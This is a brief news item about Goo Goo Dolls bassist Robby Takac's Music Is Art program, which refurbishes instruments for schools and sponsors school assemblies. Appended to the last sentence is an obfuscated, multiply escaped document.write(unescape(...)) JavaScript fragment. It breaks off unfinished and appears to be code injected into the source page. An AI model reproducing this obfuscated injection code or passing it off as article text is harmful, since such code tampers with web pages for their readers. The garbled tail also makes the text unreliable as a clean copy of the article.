Goo Goo Dolls bassist Robby Takac is reaching out to teenagers with his own kind of music program.
Takac has created the Music Is Art program, which collects instruments, refurbishes them and gives them to schools. He also sponsors an assembly featuring two bands on his label, The Juliet Dagger and Last Conservative. Takac says they aim to reach the kids who normally don't pay attention in assemblies. He says one thing they try to teach is that there are options besides the more mainstream approaches to their futures. Takac realizes at that age, most teenagers think everything is lame, but he's surprised at how well the students take to the message. He says, "This assembly, trust me, is anything but lame."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
